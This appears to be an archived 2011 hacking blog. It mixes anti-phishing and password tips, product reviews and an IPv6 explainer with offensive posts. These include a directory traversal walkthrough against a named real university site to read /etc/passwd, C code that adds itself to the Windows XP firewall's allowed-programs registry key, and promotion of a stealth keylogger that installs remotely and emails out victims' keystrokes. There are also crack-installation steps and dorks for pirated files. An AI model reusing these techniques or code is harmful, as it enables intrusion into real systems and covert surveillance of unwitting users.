Monday, June 27, 2011

how to prevent email account password from hackers.


Hello friends, i going to share now how to prevent email account password from hackers. This is a complete guide to protect yourself from being hacked and secure your personal information from getting leaked or used by anybody online. This guide will also help you to learn several latest techniques that hackers use to hack email accounts and passwords. So guys lets discuss how to protect or prevent your email account passwords from getting hacked. Its a must read post for all online users who uses email and social networking websites.
As its a Great saying " Prevention is better than Cure".  So you must know to prevent yourself rather than curing after got victimized or falling prey to these hacking attacks.



Complete Guide to prevent your Email Passwords from Hackers:
1. Don't use the links in an email, instant message, or chat to get to any web page if you suspect the message might not be authentic or you don't know the sender or user's handle. Instead, call the company on the telephone, or log onto the website directly by typing in the Web address in your browser.
2. Avoid filling out forms in email messages that ask for personal financial information.
3. You should only communicate information such as credit card numbers or account
information via a secure website or the telephone.  Always ensure that you're using a secure website when submitting credit card or other sensitive information via your Web browser.
 
  • Phishers are now able to 'spoof,' or forge BOTH the "https://" that you normally see when you're on a secure Web server AND a legitimate-looking address. You may even see both in the link of a spam email. Again, make it a habit to enter the address of any banking, shopping, auction, or financial transaction website yourself and not depend on displayed links.  
  • Phishers may also forge the yellow lock you would normally see near the bottom of your screen on a secure site. The lock has usually been considered as another indicator that you are on a 'safe' site. The lock, when double-clicked, displays the security certificate for the site. If you get any warnings displayed that the address of the site you have displayed does NOT match the certificate, do not continue. 
  • Remember not all spam sites will try to show the "https://" and/or the security lock. Get
    in the habit of looking at the address line, too. Were you directed to PayPal? Does the
    address line display something different like
    "http://www.gotyouscammed.com/paypal/login.htm?"  Be aware of where you are going. 

4. Consider installing a Web browser tool bar to help protect you from known fraudulent websites. These toolbars match where you are going with lists of known phisher Web
sites and will alert you.  
The newer version of Internet Explorer version 7 or 8 beta includes this tool bar as does FireFox Verison 4.xx or 5 Beta too.
5. Regularly log into your online accounts. Don't leave it for as long as a month before you check each account.

6. Regularly check your bank, credit and debit card statements to ensure that all transactions are legitimate (or legal) and done by you or in your supervision. If anything is suspicious or you don't recognize the transaction, contact your bank and all card issuers.
 
7. Ensure that your browser is up to date and security patches applied.

8. Never Download anything from anonymous links or links in email accounts or chat boxes.
  
9. Always avoid downloading cracks, keygens and patches as most of these contains Trojans and Malware content that will leak you personal data to hackers.

10. Regularly update your antivirus and anti-spyware software so that all new viruses are detectable and can be repaired easily.

11. While Installing freewares always take precautions and don't install the additional recommended things by the software's. Install only those that you know or that might be useful for you. And never install toolbars as their codes are dynamic that means they can be used to steal your private secured data such as credit card details, email accounts information and other personal data such as your searching patterns and your computer event logs etc.
  
  
Few more Important Things that you should always remember:

Always report "phishing" or “spoofed” e-mails to the following groups:  
  • forward the email to reportphishing@antiphishing.org  
  • forward the email to the Federal Trade Commission at spam@uce.gov  
  • forward the email to the "abuse" email address at the company that is being
    spoofed (e.g. "spoof@ebay.com")  
  • when forwarding spoofed messages, always include the entire original email with
    its original header information intact  
  • notify The Internet Crime Complaint Center of the FBI by filing a complaint on
    their website: www.ic3.gov

Some Tips while choosing your Passwords:
  • Choose a complex password. If you use a simple password such as "password" or "rockstar" or any dictionary word, it makes it easy for people to guess your password. This is especially true if your potential hackers are friends and family members who might try to guess. Instead, choose a password that makes use of both capital and lower case letters, numbers and special characters like the percent or dollar sign.
  • Change your password regularly. Every month, make a point of changing your password to a new complex.
  • article source:isoftdl.com

Thursday, June 23, 2011

5 phases of Web Application attack - A HackingAlert Exclusive research!




Web applications are now the next big victim after games for hackers .
A recent research shows that 70% of vulnerabilities exist at the top layer of the web application.
The attackers use several techniques to hack web applications . I have been constantly monitoring different types of web attacks involving different methods but there ar some common steps which all hackers follow in order to perform their attack on applications. I am presenting a 5 phase method which covers from gaining information to maintaining the attack on the application . You can also read one of the most popular articles of this blog - How to hack a website/web server - a 3 step guide.




Phase 1: Silent reconnaissance
The attacker gathers as much information as possible identifying potentially vulnerable areas of the application. This is done discretely using tools such as Web debugging proxies to monitor the traffic between the browser and the Web server. The attacker traverses the site, much like a normal user, while collecting valuable information about how the application works. This activity goes undetected, because as far as the server is concerned, it represents the traffic of a legitimate user.
At this point, the attacker will stop interacting with the target server directly. The attacker will spend significant time reviewing the data collected by the debugging proxy and extracting useful facts about the environment. This may include the type of hardware and software in the network architecture, programming languages, libraries, source code and comments. This information will be leveraged during the later phases of the attack.



Phase 2: Attack vector establishment

This phase begins once the attacker has gained an understanding of the application design and the breadth of its attack surface. Until now, the interaction with the server has been fairly benign and undetectable, but in the next phase, things get a little louder. For this reason, the attacker will often start using an anonymous proxy to interact with the server.
The attacker may also employ other protective measures such as browser privacy controls, firewalls, antivirus and virtual machines. Once the attacker is confident that his traffic can no longer be traced, the real work can start.
With notes in hand, and a debugging proxy up and running, the attacker starts to seek out dynamic pages, especially those which accept form or query input. The attacker will then determine what the various input parameters are, and attempt to derive boundary cases for them. Boundary case values are sent to the application to provoke an unintended response from the server

The attacker repeats this activity on all dynamic pages that he is aware of. When finished, he has a list of all the parameters that are correctly validated by the server, and more important, the parameters that are vulnerable -- they produce calculation errors, fatal errors, or are blindly injected into the response without encoding or cleansing.
The attacker tailors the boundary cases so they do not match any known attack signatures, so this activity is almost always imperceptible to server administrators. The attacker still has to remain anonymous, because many applications keep track of errors and record the addresses of the clients responsible for generating them. Because of this, administrators could discover the activity later by inspecting logs with a security tool. However, this is typically long after the attacker has moved on to the next phase.
If the attacker was able to obtain a large number of potentially vulnerable inputs, the next step is to start testing each one to see if an attack vector is possible. For example, if the attacker received an SQL error when submitting a value of "my'username" in a login form, then there is probably an SQL injection vulnerability. The attacker will start supplying more structured SQL syntax into the input in an effort to shape the resulting error.



Phase 3: Implementation

This phase begins once the attacker has identified the vulnerabilities and their associated attack vectors. This is where the real damage starts. The scope of damage depends on the types of vulnerabilities that are exploited. For example:

• The attacker starts to mine the database for sensitive information, delete existing information, or insert new fraudulent information.

• The attacker seeds the application with malicious code by way of XSS vulnerabilities and reflected parameters.

• The attacker designs complex phishing scams that use the vulnerabilities to give the scam credibility.

The possibilities are only constrained by the potential vectors, and how they can be chained together to deliver more powerful payloads. Most of the damage has been done at this point.



Phase 4: Automation

Attacks such as input parameter abuse are often single request vectors. This means the damage happens within a single HTTP request. Sometimes, however, the execution of an attack vector provides incremental benefits each time it is performed. Generally, if the attack vector generates revenue for the attacker, the next step is to automate the attack. This enables the attacker to repeat the attack vector over and over again, multiplying the overall monetary gain.
Because the attacker must still cover his tracks in order to execute the automated attack, he will generally code the attack into a remotely controlled bot. This tactic poses serious challenges for the administrator, because even if the attack is identified, an IP-based block will no longer be sufficient. To accomplish this, attackers will often use a prefabricated "command and control" kit that allows them to quickly raise and command a bot army.


Phase 5: Maintenance

Finally the attack is complete. The hacker has extracted as much data as his experience and skill allows. He will go off and work on other projects until his automated bots start to fail. This will signal that some fundamental vulnerability in the attack vector has been patched or modified. If the attacker cares enough, he may repeat the entire process over again, focusing on the parts of the application that are essential for the bots proper functioning. He will find a work around for the new patch, create an entirely new attack vector, or move to a different target altogether.

These phases clearly encompass all the techniques involved in penentrating a web application. The difficulty of the attack can vary according to the sofistication of the application.

Monday, June 20, 2011

Free WinRar Password Recovery

Today i am going to discuss the  awesome Zip password Recovery Magic v6.1.1.169, that can easily crack zip passwords. It provides brute-force and dictionary cracking methods, you can pause and resume recovery job easily. All you need to recover your password is just to add your file to the operation window.


Free Download Zip Password Recovery Magic


How to install Zip password Recovery Magic v6.1.1.169 ?

1. Extract RAR.PW.Remover to your computer and install as normal


2. Go to the crack folder and copy the File Named “urpwdr11rc16.exe” , then go to the hard drive where You Installed the Program , default folder is Program Files/Intelore” Folder/RAR-PR. Then paste the copied crack file into this directory and accept all permission requests!



Saturday, June 18, 2011

Perfect Keylogger



 Perfect Keylogger is a new generation keylogger which is absolutely undetectable. Complex internal mechanisms are hidden from the user behind the friendly interface. Perfect Keylogger is translated into 20 languages and is increasingly popular around the world! It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list. Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later.
Perfect Keylogger has unique remote installation feature. You can attach keylogger to any other program and send it by e-mail to install on the remote PC in the stealth mode. Then it will send keystrokes, screenshots and websites visited to you by e-mail or FTP. 
You don't have to worry about the firewall alerts - now our keylogger can be invisible for the firewall program. Our keylogger supports remote installation, update and removal - no physical access required!
New Smart Rename feature lets you to rename all keylogger's executable files and registry entries using one keyword! One of the most powerful features of Perfect Keylogger is its advanced Keyword Detection and Notification. Create a list of "on alert" words or phrases and keylogger will continually monitor keyboard typing,URLs and web pages for these words or phrases.
Features: 
• Has an intuitive interface and very easy to use, even for beginners   
• Absolutely invisible mode    
• Remote Installation / Update / Uninstallation     
• Logs texts and passwords typed in the every application, including popular instant messengers   
• Supports virtually all input languages (Unicode engine), including Japanese, Arabian, Thai, Chinese! (v.1.65)     
• Visual surveillance (screenshots)     
• Slide show for screenshots     
• Captures the passwords behind the asterisks     
• Captures button clicks     
• Captures screen information on every mouse click     
• Logs websites visited     
• Captures ICQ, Miranda, Skype, Gooqle Talk, MSN, AIM, AOL, Yahoo, QIP chats!     
• Keyword Detection and Notification     
• Records contents of password protected web pages, including Web Mail messages (using our additional software)    
• Monitors Windows Clipboard     
• Sends log by e-mail (in the stealth mode)    
• Sends screenshots by e-mail (in the stealth mode)     
• Uploads ALL logs into the separate folders by FTP (in the stealth mode)!     
• Supports renaming of the keylogger's files and registry entries     
• Monitors computer activity only when user goes online (option)     
• Can be invisible for the firewall program     
• Invisible in the Windows startup list     
• Monitors all users of the PC, even if you don't know their passwords     
• User friendly HTML file format for emailed logs     
• Invisible in Windows NT/2000/XP/Vista Task Manager and Windows 9.x/Me Task List   
• Records Windows 9.x/Me logon passwords     
• Records Windows 2000/XP logon passwords (using our additional software)    
• "Quick Install" - configure keylogger on your PC, then just run it on another PC to install     
• Intercepts DOS-box and Java-chat keystrokes    
• Installation packet fits into 3.5" floppy   
• Supports international keyboards   
• External log viewer   
• Supports printing of the log     
• Optimized for Windows XP/Vista    
• Strong encryption of the log file   
• Records keystrokes in the specified applications   
• Exports log to HTML
Perfect Keylogger for Windows 98/2000/XP/Vista and Windows 7

Thursday, June 16, 2011

Hack Google Searching




Songs
javascript:Qr=”;if(!Qr){void(Qr=prompt(
‘ENTER ARTIST OR SONG NAME:’,”))};if(Qr)location.href=’http://www.google.com/ie?query=%22parent+directory%22+%22‘+escape(Qr)+’%22+mp3+OR+wma+OR+ogg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N’
E-book
javascript:Qr=”;if(!Qr){void(Qr=prompt(‘Enter Author name OR Book name:’,”))};if(Qr)location.href=’http://www.google.com/ie?query=%22parent+directory%22+%22‘+escape(Qr)+’%22+pdf+OR+rar+OR+zip+OR+lit+OR+djvu+OR+pdb+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N’
Image
javascript:Qr=”;if(!Qr){void(Qr=prompt(‘ENTER IMAGE NAME:’,”))};if(Qr)location.href=’http://www.google.com/ie?query=%22parent+directory%22+%22‘+escape(Qr)+’%22+jpg+OR+png+OR+bmp+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N’
Movie
javascript:Qr=”;if(!Qr){void(Qr=prompt(‘ENTER MOVIE NAME:’,”))};if(Qr)location.href=’http://www.google.com/ie?query=%22parent+directory%22+%22‘+escape(Qr)+’%22+avi+OR+mov+OR+mpg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N’
Application
javascript:Qr=”;if(!Qr){void(Qr=prompt(‘ENTER app NAME(CREATED BY 5ury4;if(Qr)location.href=’http://www.google.com/ie?query=%22parent+directory%22+%22‘+escape(Qr)+’%22+zip+OR+rar+OR+exe+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N”
Just copy from javascriot and paste this on your addrress bar and enter the details and Enjoy!

Tuesday, June 14, 2011

Secure webmail encryption service eCrypt.me


When it comes to send encrypted email messages the easiest way to do it is by using a webmail service that supports it, with email encryption working in the background you do not have to worry about digital certificates and PGP encryption keys, everyone can use it with zero knowledge about encryption, the responsibility for keeping the messages secure lying with the provider and not the user.
With eCrypt.me you can send messages just like you would do with any other webmail service but their end to end encryption making it impossible for others to read it, eCrypt.me doesn’t have as many features as Gmail, Hotmail and Yahoo have, it appears to have been designed with businesses in mind, maximizing employee productivity and making it very easy to use with a zero training curve, it doesn’t use Java like Hushmail does, its email interface loads quickly, it is simple and easy to use, the communications between eCrypt.me and your browser is secured via SSL with a Verisign digital certificate using AES256 encryption.
eCrypt.me encrypted webmail service
eCrypt.me encrypted webmail service
Registering an account with eCrypt.me requires you to have a valid email address where to receive an activation email, check the spam folder because that is where it went in my case, the service allows you to use your own email as username to login, in order for someone to communicate with you using end to end encryption they will need to have an account with eCrypt.me, this happens with all other webmail services using encryption, and it is the biggest drawback of these kind of services, both sides have to use the same service for encryption to take place.
eCrypt.me has a FileVault where you can upload files for storage, the files (photos, pdf,etc) can not be viewed in your browser, it just makes it easy to send encrypted attachments selecting them from the FileVault when you compose an email. There is an account activity log that tells you the last login IP, this log can be exported as CSV, Excel and XML, a basic statistics screen tells you the mailbox and bandwidth usage, the security settings have two basic choices, encrypting email subjects and password time out settings.
Overall this is a very simple webmail service, if you like easy to use no nonsense webmail with encryption that is useful to send email and nothing else you will feel at home, I would consider this webmail service if I had a business with a high turn over employee because I would not have to train people on how to send encrypted email and employees can’t waste their time in messengers and others non work related features that some email services have.
This encryption webmail service is still in beta release, at the moment it is free to use, I doubt it will be once it comes out of beta because someone needs to pay the bills.

Sunday, June 12, 2011

Hack a website using Directory Transversal attack?


What is root directory of web server ?

It is a specific directory on server in which the web contents are placed and can be seen by website visitors. The directories other that root may contain any sensitive data which administrator do not want visitors to see. Everything accessible by visitor on a website is  placed in root directory. The visitor can not step out of root directory.

what does ../ or ..\ (dot dot slash) mean  ? 

The ..\ instructs the system to go one directory up. For example, we are at this locationC:\xx\yy\zz. On typing ..\ , we would reach at C:\xx\yy.

Again on typing ..\ , we would rech at C:\xx 



Lets again go at location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is to directory xx) where abc.txt is placed.

Note : Its ..\ on windows and ../ on UNIX like operating syatem.

What is Directory Transversel attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is  to access sensitive files placed on web server by stepping out of the root directory using dot dot slash .

The following example will make clear everything

Visit this website vulnerable to directory transversal attack

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This webserver is running on UNIX like operating system. There is a directory 'etc' on unix/linux which contains configration files of programs that run on system. Some of the files are passwd,shadow,profile,sbin  placed in 'etc' directory.

The file etc/passwd contain the login names of users and even passwords too.

Lets try to access this file on webserver by stepping out of the root directory. Carefully See the position of directories placed on the webserver.

We do not know the actual names and contents of directories except 'etc' which is default name , So I have
marked them as A,B,C,E or whatever.

We are in directory in F accessing the webpages of website.


Lets type this in URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search the directory 'etc' in F. But obviously, there is nothing like this in F, so it will return nothing

Now type
http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd
Now this will step up one directory (to directory E ) and look for 'etc' but again it will returnnothing.

Now type 

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D ) and look for 'etc' but again it will return nothing.

So by proceeding like this, we we go for this URL
http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to 'etc' directory and show us contents of 'passwd' file.
To understand the contents of 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format


You can also view etc/profile ,etc/services and many others files like backup files which may contain sensitive data. Some files like etc/shadow may be not be accessible because they are accesible only by privileged users.

Note- If proc/self/environ would be accessible, you might upload a shell on serverwhich is called as Local File Inclusion.

Counter Measures

1. Use the latest web server software
2. Effectively filter the user's input

Prevent identity theft and fraud with Identity Finder


With hard disks getting bigger in size and thousands of files in our computers it is easy to leave behind personal data that could be used for identity theft, Identity Finder stops the risk of data leakage by finding and securing private information, it would be a good idea to run something like this on your hard disk before taking your laptop to the repair shop or allowing anyone who is not your family access to your computer.
Identity Finder will scan your computer files searching credit card numbers, dates of birth, passwords, bank account numbers, driver license, phone numbers and other personal data that is often used by identity thieves, it can be used to search for country specific data like the Canadian SIN numbers, British NHS identification and Australian TFN account numbers.
After the scan the software will show you all of the data it has found on a detailed preview pane with statistics and it will offer to securely wipe it using US Department of Defense standards (DOD 5220.22-M), any wrongly classified data can be filtered out from future scans by marking it as ignore, if you need to have the data in your computer you don’t necessarily have to erase it and can use Identity Finder to encrypt it, the applications integrates with Windows Explorer creating context menu options for easy access.
Some of the locations that will be scanned for sensitive data include the Internet browser temporary files (IE and Firefox), cookies, messenger logs, text documents (.docx.pdf, .txt, .rtf.html), compressed files (.zip, .gzip, .rar, .bzip), email messages (Windows Mail, Thunderbird, Outlook Express) and others.
Identity Finder to stop credit card fraud
Identity Finder to stop credit card fraud
Identity theft contains all of the tools that are needed by those not using full disk encryption, a secure data wiper, file encryption and a password manager with the ice on the cake being the hard disk scanning for unsecured data useful to identity thieves. The free edition of this software is pretty basic, it comes with a data shredder and it only scans for credit card numbers and passwords, if you want the whole suite with all of the features you will have to buy it.

Wednesday, June 8, 2011

Difference between IPv4 and IPv6


IPv6From a long time there is so much debate about changing from ipv4 to ipv6. But what are these so called ipv4 & ipv6, what is the difference between ipv4 and ipv6 and why is it necessary to change from ipv4 to ipv6. In this post we will discuss about all these in simple manner(at least i will try to be simple).

What is an IP

IP which is the short form of Internet Protocol, In simple, this IP is a set of technical rules which define how computer should communicate over a network. This IP has a task to do i.e to deliver datagram's from the source host to destination host based on their address. This address are called as IP(Internet Protocol) address. Currently there are two type of versions i.e IP version 4(IPv4) and IP version 6(IPv6).

What are IPv4 and IPv6

IPv4 is the short form of Internet Protocol Version 4. IPv4 is the first version of Internet Protocol which is widely used now and is deployed in 1981.
IPv6 is the short form of Internet Protocol Version 6. IPv6 is the newer version of Internet Protocol which is already in use(less than 1% uses it) and is more sophisticated then IPv4 and has a larger address pool. IPv6 is deployed in 1999.

Difference Between IPv4 and IPv6

When it comes to the difference between them there are some major differences which we should notice and after reading these differences you would say that IPv6 is better than IPv4.
1) IPv4 and IPv6 are deployed in 1981 and 1999 respectively.
2) IPv4 has a address size of 32-bit number, So the number of IP address are limited to 232 which is equal to 4 billion IPv4 address, if you want to be exact then there are 4,294,967,296 IPv4 address.
But when it comes to IPv6 it has a address size of 128-bit number, which means that the number of IPv6 address are equal to 2128 or approximately 340 undecillion or 3.4×1038 . To be exact there are 340,282,366,920,938,463,463,374,607,431,768,211,456 IPv6 address.
3) IPv4 address has a Dot Decimal Notation ex: 195.165.252.75. But the IPv6 address has a Hexadecimal and Colon separated Notation ex: 3FFF:2030:0535:AB0D:2125:4567:8902:ABDC.
4) IPv4 address has a prefix notation like this 195.165.0.0/24 but IPv6 address has prefix notation like this 3FFF:2030:0535::/48.
5) When compared to IPv4, IPv6 can make the routers task more simpler.
6)IPv6 can allows bigger payloads when compared to IPv4.
7) As you can see from above(point 1) IPv6 has a more useable address when compare to IPv4 which has only a 4 billion address.
8) IPv6 is far more better suited for mobile networks when compared to IPv4.
Not only these but there are may other major and important differences and features in IPv6.

Why is it necessary to shift from IPv4 to IPv6

This is the first major question you get, right… Then here is the famous answer, As its said before IPv4 has 4 billion address and no doubt that this is a large number when it was first deployed but we all do know that internet is growing bigger and bigger so as the ip address which in turn fills out the 4 billion address space. So, there is on other way but to shift to IPv6 which has a large number of address and capabilities.
Mean-while you can test your IPv6 compatibility here at http://www.test-ipv6.com. I had done my test on my collage computer and it is incompatible :( but my home system is compatible :(

My  lap are in compatible.
So, this is it. Do share your views, comments, and knowledge here by commenting and as i said before i tried to be simple in this post so if you think that i missed any important point about saying then please tell me through your comments.

Monday, June 6, 2011

How to Bypass Windows XP Firewall using C program.

Hello Friends, today i will share with you the technique using which we can bypass windows-xp service pack-2 firewall. Its a 100% workinghack and its basically an exploit in windows XP.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.


Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-
#include <*stdio.h*>
#include <*windows.h*>
#include <*ezsocket.h*>
#include <*conio.h*>
#include "Shlwapi.h" 
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");

RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
 
struct sockaddr_in remote_addr;

fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");

sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello
Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello 
Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, "quit"))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */
Remove ** from the header files... easier to understand...Here we are just manipulating registry values using this program...

Friday, June 3, 2011

Make Your Computer Login Screen Like FBI Tunnel


[Image: img20110327121913.jpg]



Step 1 : Download Logon Studio ,

Image

LogonStudio 1.7 | 7Mb

Information:

Longing for some change in your life? Why not start with that boring old Windows XP logon screen? With the freeware LogonStudio, choosing another screen is a matter of two clicks. Alternately, you can design your own with a built-in editor.
The first option is a lot easier. About 30 cool screens are available on the WinCustomize site, and the program can randomly select one on every boot. Editing is less straightforward. You build or modify logon screens by tweaking parameters on a lengthy list of elements. So you might, for instance, change the FirstColor parameter of the Centre Panel element to a new shade of blue. This allows you to customize everything from background to letterings to buttons, but beginners will find the process quite confusing. The sketchy online help isn't much assistance, either.


Download For Windows Vista(Works With WIndows 7 too)


Download For WindowsXp:


2, Download FBI Files From Here:


3, iF YOU WANT TO REMOVE SWITCH USER BUTTON THEN YOU CAN DO WITH THIS REGISTERY TWEAK.